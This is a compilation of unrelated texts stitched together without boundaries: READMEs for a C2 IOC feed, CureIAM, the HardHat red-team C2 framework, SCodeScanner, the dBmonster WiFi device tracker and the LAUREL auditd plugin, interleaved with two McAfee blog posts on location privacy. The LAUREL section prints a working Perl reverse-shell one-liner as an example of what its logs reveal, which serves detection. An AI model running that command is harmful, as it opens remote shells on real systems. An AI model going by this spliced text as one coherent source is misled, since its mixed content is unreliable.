Free-to-use IOC feed for various tools/malware. It started out covering just C2 tools but has morphed into tracking infostealers and botnets as well. It uses Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool, and there is an all.txt containing every IP combined.
The feed should update daily. Work is ongoing to make the backend more reliable.
Many of the Shodan queries have been sourced from other CTI researchers:
Huge shoutout to them!
Thanks to BertJanCyber for creating the KQL query for ingesting this feed
And finally, thanks to Y_nexro for creating C2Live in order to visualize the data
If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY:

echo export SHODAN_API_KEY=API_KEY >> ~/.bashrc
python3 -m pip install -r requirements.txt
python3 tracker.py
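The output layout described above (one file per tool plus a combined all.txt in the data directory) can be sketched with a small helper. This is a hypothetical illustration, not the repository's actual code; the function name and signature are assumptions:

```python
from pathlib import Path

def write_feed(per_tool_ips: dict[str, set[str]], out_dir: str = "data") -> None:
    """Write one sorted IP list per tool, plus a deduplicated all.txt."""
    root = Path(out_dir)
    root.mkdir(exist_ok=True)
    combined: set[str] = set()
    for tool, ips in per_tool_ips.items():
        # One file per tracked tool, e.g. data/cobaltstrike.txt
        (root / f"{tool}.txt").write_text("\n".join(sorted(ips)) + "\n")
        combined |= ips
    # all.txt holds every IP across tools, deduplicated
    (root / "all.txt").write_text("\n".join(sorted(combined)) + "\n")
```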
I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set hard guidelines around what can be submitted; just know that fidelity is paramount (a high true-to-false-positive ratio is the focus).
CureIAM is an easy-to-use, reliable, and performant engine for enforcing the Principle of Least Privilege on GCP cloud infrastructure. It enables DevOps and security teams to quickly clean up accounts in GCP infra that have been granted more permissions than they require. CureIAM fetches recommendations and insights from the GCP IAM recommender, scores them, and enforces those recommendations automatically on a daily basis. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of the GCP IAM recommender APIs and the Cloudmarker framework.
Discover what makes CureIAM scalable and production grade.
CureIAM computes three scores for each recommendation: safe_to_apply_score, risk_score, and over_privilege_score. Each score serves a different purpose; for example, safe_to_apply_score indicates whether a recommendation can be applied automatically, based on the thresholds set in the CureIAM.yaml config file.

Since CureIAM is built with Python, you can run it locally with the commands below. Before running, make sure a configuration file is present at one of /etc/CureIAM.yaml, ~/.CureIAM.yaml, ~/CureIAM.yaml, or CureIAM.yaml, and that a service-account JSON key file is present in the current directory, preferably named cureiamSA.json. The SA private key can be named anything, but for the Docker image build it is preferred to use this name. Make sure to reference this file in the config for GCP cloud.
# Install necessary dependencies
$ pip install -r requirements.txt
# Run CureIAM now
$ python -m CureIAM -n
# Run CureIAM process as scheduler
$ python -m CureIAM
# Check CureIAM help
$ python -m CureIAM --help
CureIAM can also be run inside a Docker environment; this is completely optional and can be used for CI/CD with K8s cluster deployments.
# Build docker image from dockerfile
$ docker build -t cureiam .
# Run the image, as scheduler
$ docker run -d cureiam
# Run the image now
$ docker run -it cureiam -m cureiam -n
CureIAM.yaml
configuration file is the heart of the CureIAM engine. Everything the engine does is based on the pipeline configured in this config file. Let's break it down into different sections to make the config look simpler.
logger:
  version: 1
  disable_existing_loggers: false
  formatters:
    verysimple:
      format: >-
        [%(process)s]
        %(name)s:%(lineno)d - %(message)s
      datefmt: "%Y-%m-%d %H:%M:%S"
  handlers:
    rich_console:
      class: rich.logging.RichHandler
      formatter: verysimple
    file:
      class: logging.handlers.TimedRotatingFileHandler
      formatter: verysimple
      filename: /tmp/CureIAM.log
      when: midnight
      encoding: utf8
      backupCount: 5
  loggers:
    adal-python:
      level: INFO
  root:
    level: INFO
    handlers:
      - rich_console
      - file

schedule: "16:00"
This subsection of the config uses the Rich logging module and schedules CureIAM to run daily at 16:00.
Next comes the plugins section in CureIAM.yaml. You can think of this section as the declaration of the different plugins:

plugins:
  gcpCloud:
    plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
    params:
      key_file_path: cureiamSA.json
  filestore:
    plugin: CureIAM.plugins.files.filestore.FileStore
  gcpIamProcessor:
    plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
    params:
      mode_scan: true
      mode_enforce: true
      enforcer:
        key_file_path: cureiamSA.json
        allowlist_projects:
          - alpha
        blocklist_projects:
          - beta
        blocklist_accounts:
          - foo@bar.com
        allowlist_account_types:
          - user
          - group
          - serviceAccount
        blocklist_account_types:
          - None
        min_safe_to_apply_score_user: 0
        min_safe_to_apply_score_group: 0
        min_safe_to_apply_score_SA: 50
  esstore:
    plugin: CureIAM.plugins.elastic.esstore.EsStore
    params:
      # Change http to https if your Elasticsearch uses https
      scheme: http
      host: es-host.com
      port: 9200
      index: cureiam-stg
      username: security
      password: securepassword
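The min_safe_to_apply_score_* thresholds above gate automated enforcement per account type. A minimal sketch of how such a gate could work; the threshold values mirror the config keys shown here, but the function itself is hypothetical, not CureIAM's actual code:

```python
# Hypothetical thresholds mirroring min_safe_to_apply_score_user/_group/_SA
THRESHOLDS = {"user": 0, "group": 0, "serviceAccount": 50}

def safe_to_apply(account_type: str, safe_to_apply_score: int) -> bool:
    """Return True if a recommendation clears the configured threshold."""
    threshold = THRESHOLDS.get(account_type)
    if threshold is None:
        # Account type not allowlisted: never auto-apply
        return False
    return safe_to_apply_score >= threshold
```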
Each of these plugin declarations has to be of this form:
plugins:
  <plugin-name>:
    plugin: <class-name-as-python-path>
    params:
      param1: val1
      param2: val2
For example, the esstore plugin above points to CureIAM.plugins.elastic.esstore.EsStore, i.e. the EsStore class in the esstore module. All the params defined in the YAML have to match the parameters declared in the __init__() function of that plugin class.
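As an illustration of that mapping, a stripped-down, hypothetical store plugin might look like this (the real EsStore accepts more parameters and actually talks to Elasticsearch):

```python
# Hypothetical, simplified plugin: each __init__ keyword argument
# corresponds to one key under `params` in CureIAM.yaml.
class EsStore:
    def __init__(self, scheme="http", host="localhost", port=9200,
                 index="cureiam-stg", username="", password=""):
        self.url = f"{scheme}://{host}:{port}/{index}"

# The framework can then instantiate the plugin from the parsed YAML params:
params = {"scheme": "http", "host": "es-host.com", "port": 9200, "index": "cureiam-stg"}
store = EsStore(**params)
```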
audits:
  IAMAudit:
    clouds:
      - gcpCloud
    processors:
      - gcpIamProcessor
    stores:
      - filestore
      - esstore
Multiple audits can be created this way. The one created here is named IAMAudit and uses four plugins: gcpCloud, gcpIamProcessor, filestore, and esstore. Note that these are the same plugin names declared in Step 2. Again, this only defines the pipeline; it does not run it. It is picked up for running by the definition in the next step.
Finally, the run section tells CureIAM to run the audits defined in the previous step:

run:
  - IAMAudit
And this completes the configuration for CureIAM; you can find the full sample here. This config-driven pipeline concept is inherited from the Cloudmarker framework.
The JSON indexed into Elasticsearch by the Elasticsearch store plugin can be used to build dashboards in Kibana.
[Please do!] We are looking for any kind of contribution to improve CureIAM's core functionality and documentation. When in doubt, make a PR!
Gojek Product Security Team
Library versions are pinned to avoid any backward-compatibility issues.
Running docker compose: docker-compose -f docker_compose_es.yaml up
mode_scan: true
mode_enforce: false
HardHat is a multiplayer C# .NET-based command-and-control framework designed to aid red team engagements and penetration testing. HardHat aims to improve quality-of-life factors during engagements by providing an easy-to-use yet robust C2 framework.
It contains three primary components: an ASP.NET team server, a Blazor .NET client, and C#-based implants.
Alpha Release - 3/29/23. NOTE: HardHat is in alpha; it will have bugs, missing features, and unexpected behavior. Thank you for trying it, and please report back any issues or missing features so they can be addressed.
Discord: join the community to talk about HardHat C2, programming, red teaming, and general cybersecurity. The Discord community is also a great way to request help, submit new features, stay up to date on the latest additions, and report bugs.
Documentation can be found at docs.
To configure the team server's starting address (where clients will connect), edit HardHatC2\TeamServer\Properties\LaunchSettings.json, changing "applicationUrl": "https://127.0.0.1:5000" to the desired location and port. Start the team server with dotnet run from its top-level folder ../HardHatC2/Teamserver/.
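For reference, the relevant fragment of LaunchSettings.json might look like the following. Only the applicationUrl value comes from the instructions above; the surrounding structure is a sketch based on the usual ASP.NET launchSettings layout, so check the actual file before editing:

```json
{
  "profiles": {
    "TeamServer": {
      "commandName": "Project",
      "applicationUrl": "https://127.0.0.1:5000"
    }
  }
}
```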
Code contributions are welcome; feel free to submit feature requests, pull requests, or send me your ideas on Discord.
Do you remember the days of printing out directions from your desktop? Or the times when passengers were navigation co-pilots armed with a 10-pound book of maps? You can thank location services on your smartphone for today’s hassle-free and paperless way of getting around town and exploring exciting new places.
However, location services can prove a hassle to your online privacy when you enable location sharing. Location sharing is a feature on many connected devices – smartphones, tablets, digital cameras, smart fitness watches – that pinpoints your exact location and then distributes your coordinates to online advertisers, your social media following, or strangers.
While there are certain scenarios where sharing your location is a safety measure, in most cases, it’s an online safety hazard. Here’s what you should know about location sharing and the effects it has on your privacy.
Location sharing is most beneficial when you’re unsure about new surroundings and want to let your loved ones know that you’re ok. For example, if you’re traveling by yourself, it may be a good idea to share the location of your smartphone with an emergency contact. That way, if circumstances cause you to deviate from your itinerary, your designated loved one can reach out and ensure your personal safety.
The key to sharing your location safely is to only allow your most trusted loved one to track the whereabouts of you and your connected device. Once you’re back on known territory, you may want to consider turning off all location services, since it presents a few security and privacy risks.
In just about every other case, you should definitely think twice about enabling location sharing on your smartphone. Here are three risks it poses to your online privacy and possibly your real-life personal safety:
Does it sometimes seem like your phone, tablet, or laptop is listening to your conversations? Are the ads you get in your social media feeds or during ad breaks in your gaming apps a little too accurate? When ad tracking is enabled on your phone, it allows online advertisers to collect your personal data that you add to your various online accounts to better predict what ads you might like. Personal details may include your full name, birthday, address, income, and, thanks to location tracking, your hometown and regular neighborhood haunts.
If advertisers kept these details to themselves, it may just seem like a creepy invasion of privacy; however, data brokerage sites may sell your personally identifiable information (PII) to anyone, including cybercriminals. The average person has their PII for sale on more than 30 sites and 98% of people never gave their permission to have their information sold online. Yet, data brokerage sites are legal.
One way to keep your data out of the hands of advertisers and cybercriminals is to limit the amount of data you share online and to regularly erase your data from brokerage sites. First, turn off location services and disable ad tracking on all your apps. Then, consider signing up for McAfee Personal Data Cleanup, which scans, removes, and monitors data brokerage sites for your personal details, thus better preserving your online privacy.
Location sharing may present a threat to your personal safety. A stalker could be someone you know or a stranger. Fitness watches that connect to apps that share your outdoor exercise routes can be especially risky, since over time you're likely to reveal patterns of the times and locations where one could expect to run into you.
Additionally, stalkers may find you through your geotagged social media posts. Geotagging is a social media feature that adds the location to your posts. Live updates, like live tweeting or real-time Instagram stories, can pinpoint your location accurately and thus alert someone on where to find you.
Social engineering is an online scheme where cybercriminals learn all there is about you from your social media accounts and then use that information to impersonate you or to tailor a scam to your interests. Geotagged photos and posts can tell a scammer a lot about you: your hometown, your school or workplace, your favorite café, etc.
With these details, a social engineer could fabricate a fundraiser for your town, for example. Social engineers are notorious for evoking strong emotions in their pleas for funds, so beware of any direct messages you receive that make you feel very angry or very sad. With the help of ChatGPT, social engineering schemes are likely going to sound more believable than ever before. Slow down and conduct your own research before divulging any personal or payment details to anyone you’ve never met in person.
Overall, it’s best to live online as anonymously as possible, which includes turning off your location services when you feel safe in your surroundings. McAfee+ offers several features to improve your online privacy, such as a VPN, Personal Data Cleanup, and Online Account Cleanup.
The post 3 Reasons to Think Twice About Enabling Location Sharing appeared first on McAfee Blog.
We all know that our phones know a lot about us. And they most certainly know a lot about where we go, thanks to the several ways they can track our location.
Location tracking on your phone offers plenty of benefits, such as with apps that can recommend a good restaurant nearby, serve up the weather report for your exact location, or connect you with singles for dating in your area. Yet the apps that use location tracking may do more with your location data than that. They may collect it, and in turn sell it to advertisers and potentially other third parties that have an interest in where you go and what you do.
Likewise, cell phone providers have other means of collecting location information from your phone, which they may use for advertising and other purposes as well.
If that sounds like more than you’re willing to share, know that you can do several things that can limit location tracking on your phone—and thus limit the information that can potentially end up in other people’s hands.
As we look at the ways you can limit location tracking on your phone, it helps to know the basics of how smartphones can track your movements.
For starters, outside of shutting down your phone completely, your phone can be used to determine your location to varying degrees of accuracy depending on the method used:
Now here’s what makes these tracking methods so powerful: in addition to the way they can determine your phone’s location, they’re also quite good at determining your identity too. With it, companies know who you are, where you are, and potentially some idea of what you’re doing there based on your phone’s activity.
Throughout our blogs we refer to someone’s identity as a jigsaw puzzle. Some pieces are larger than others, like your Social Security number or tax ID number being among the biggest because they are so unique. Yet if someone gathers enough of those smaller pieces, they can put those pieces together and identify you.
Things like your phone’s MAC address, ad IDs, IP address, device profile, and other identifiers are examples of those smaller pieces, all of which can get collected. In the hands of the collector, they can potentially create a picture of who you are and where you’ve been.
What happens to your data largely depends on what you’ve agreed to.
In terms of apps, we’ve all seen the lengthy user agreements that we click on during the app installation process. Buried within them are terms put forth by the app developer that cover what data the app collects, how it’s used, and if it may be shared with or sold to third parties. Also, during the installation process, the app may ask for permissions to access certain things on your phone, like photos, your camera, and yes, location services so it can track you. When you click “I Agree,” you indeed agree to all those terms and permissions.
Needless to say, some apps only use and collect the bare minimum of information as part of the agreement. On the other end of the spectrum, some apps will take all they can get and then sell the information they collect to third parties, such as data brokers that build exacting profiles of individuals, their histories, their interests, and their habits.
In turn, those data brokers will sell that information to anyone, which can be used by advertisers along with identity thieves, scammers, and spammers. And as reported in recent years, various law enforcement agencies will purchase that information as well for surveillance purposes.
Further, some apps are malicious from the start. Google Play does its part to keep its virtual shelves free of malware-laden apps with a thorough submission process as reported by Google and through its App Defense Alliance that shares intelligence across a network of partners, of which we’re a proud member. Android users also have the option of running Play Protect to check apps for safety before they’re downloaded. Apple has its own rigorous submission process for weeding out fraud and malicious apps in its store as well.
Yet, bad actors find ways to sneak malware into app stores. Sometimes they upload an app that’s initially clean and then push the malware to users as part of an update. Other times, they’ll embed the malicious code so that it only triggers once it’s run in certain countries. They will also encrypt malicious code in the app that they submit, which can make it difficult for reviewers to sniff out. These apps will often steal data, and are designed to do so, including location information in some cases.
As far as cell phone service providers go, they have legitimate reasons for tracking your phone in the ways mentioned above. One is for providing connectivity to emergency service calls (again, like 911 in the U.S.), yet others are for troubleshooting and to ensure that only legitimate customers are accessing their network. And, depending on the carrier, they may use it for advertising purposes in programs that you may willingly opt into or that you must intentionally opt out of.
We each have our own comfort level when it comes to our privacy. For some, personalized ads have a certain appeal. For others, not so much, not when it involves sharing information about themselves. Yet arguably, some issues of privacy aren’t up for discussion, like ending up with a malicious data-stealing app on your phone.
In all, you can take several steps to limit tracking on your smartphone to various degrees—and boost your privacy to various degrees as a result:
There’s no way around it: using a smartphone puts you on the map, and to some extent reveals what you’re doing there as well. Outside of shutting down your phone or popping into Airplane Mode (noting what we said about iPhones and their “Find My Network” functionality above), you have no way of preventing location tracking entirely. Yet you can most certainly limit it.
For yet more ways you can lock down your privacy and your security on your phone, online protection software can help. Our McAfee+ plans protect you against identity theft, online scams, and other mobile threats—including credit card and bank fraud, emerging viruses, malicious texts and QR codes. For anyone who spends a good portion of their day on their phone, this kind of protection can make life far safer given all the things they do and keep on there.
The post How to Limit Location Tracking on Your Phone appeared first on McAfee Blog.
SCodeScanner stands for Source Code Scanner; it scans source code to find critical vulnerabilities. The main objective of the scanner is to find vulnerabilities in source code before the code gets published to prod.
SCodeScanner has received 5 CVEs for finding vulnerabilities in multiple CMS plugins.
pip3 install -r requirements.txt
python3 scscanner.py --help
I would love to hear your feedback on this tool. Open an issue if you find any problems, and open a PR if you have something to contribute.
With dBmonster you can scan for nearby WiFi devices and track them through the signal strength (dBm) of their sent packets (sniffed with TShark). These dBm values are plotted on a graph with matplotlib. It can help you identify the exact location of nearby WiFi devices (use a directional WiFi antenna for best results) or find out how your self-made antenna performs best (antenna radiation patterns).
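Under the hood, tracking like this boils down to reading TShark output and grouping signal strengths per station. A rough sketch of that step; the tab-separated MAC/dBm field layout (as produced by something like `tshark -T fields -e wlan.sa -e wlan_radio.signal_dbm`) is an assumption about dBmonster's internals, not its actual parser:

```python
def parse_tshark_lines(lines):
    """Collect per-device dBm readings from tab-separated TShark field output."""
    readings: dict[str, list[int]] = {}
    for line in lines:
        parts = line.strip().split("\t")
        # Skip malformed lines and packets with no signal-strength field
        if len(parts) != 2 or not parts[1].lstrip("-").isdigit():
            continue
        mac, dbm = parts[0], int(parts[1])
        readings.setdefault(mac, []).append(dbm)
    return readings
```

The resulting per-MAC dBm series is what would then be fed to matplotlib for plotting.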
Feature | Linux | MacOS |
---|---|---|
Listing WiFi interfaces | ✅ | ✅ |
Track & scan on 2.4GHz | ✅ | ✅ |
Track & scan on 5GHz | ✅ | ✅ |
Scanning for AP | ✅ | ✅ |
Scanning for STA | ✅ | |
Beep when device found | ❓ | ✅ |
git clone https://github.com/90N45-d3v/dBmonster
cd dBmonster
# Install required tools (On MacOS without sudo)
sudo python requirements.py
# Start dBmonster
sudo python dBmonster.py
Platform | WiFi Adapter |
---|---|
Kali Linux | ALFA AWUS036NHA, DIY Bi-Quad WiFi Antenna |
MacOS Monterey | Internal card 802.11 a/b/g/n/ac (MBP 2019) |
Normally, you can only enable monitor mode on the internal WiFi card on MacOS with Apple's airport utility. Somehow, Wireshark (or here, TShark) can enable it too on MacOS. Cool, but because of the MacOS system and Wireshark's workaround, there are many issues running dBmonster on MacOS. After some time it could freeze, and/or you may have to stop dBmonster/TShark manually from the CLI with the ps command. If you want to run it anyway, here are some helpful tips:
Check whether any processes named dBmonster, tshark or python are still running:
sudo ps -U root
Now kill them with the following command:
sudo kill <PID OF PROCESS>
sudo airport <WiFi INTERFACE NAME> sniff
Press control + c after a few seconds
LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.
TLDR: Instead of audit events that look like this…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
This happens at the source. The generated event even contains useful information about the spawning process:
"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH
and EXECVE
elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.
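The hex-encoded arguments mentioned above can be recovered with a few lines of Python. This is a sketch of the decoding step only, not LAUREL's actual (Rust) implementation: auditd emits an argument as a bare hex string when it contains characters outside the safe set, and quotes it otherwise:

```python
def decode_audit_arg(value: str) -> str:
    """Decode one EXECVE argument from an auditd log line.

    Quoted values pass through as-is; unquoted values are hex-encoded
    byte strings and get decoded."""
    if value.startswith('"') and value.endswith('"'):
        return value[1:-1]
    return bytes.fromhex(value).decode("utf-8", errors="replace")
```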
LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).
Refer to JSON-based log format for a description of the log format.
We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.
A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event records are not suppressed, so rules like
-a always,exclude -F msgtype=EOE
should be removed.
Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id
points to the message corresponding to the last execve
syscall for this process:
"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}
Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as labels to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis when filtering out harmless events.
Consider the following rule that sets a key for apt-get invocations:
-w /usr/bin/apt-get -p x -k software_mgmt
Let's configure LAUREL to turn the software_mgmt
key into a process label that is propagated to child processes:
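A configuration for this might look like the following TOML fragment. The section and key names are recalled from LAUREL's label-process settings and should be verified against the current documentation before use:

```toml
[label-process]
# Turn the software_mgmt audit rule key into a process label...
label-keys = [ "software_mgmt" ]
# ...and pass that label on to child processes.
propagate-labels = [ "software_mgmt" ]
```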
This causes apt-get and its subprocesses to be labelled software_mgmt. For example, when running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_mgmt can be observed in LAUREL's audit log:
apt-get update
/usr/bin/dpkg --print-foreign-architectures
/usr/lib/apt/methods/http
/usr/lib/apt/methods/https
/usr/lib/apt/methods/https
/usr/lib/apt/methods/http
/usr/lib/apt/methods/gpgv
/usr/lib/apt/methods/gpgv
/usr/bin/dpkg --print-foreign-architectures
/usr/bin/dpkg --print-foreign-architectures
This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.
See INSTALL.md.
GNU General Public License, version 3
The logo was created by Birgit Meyer <hello@biggi.io>.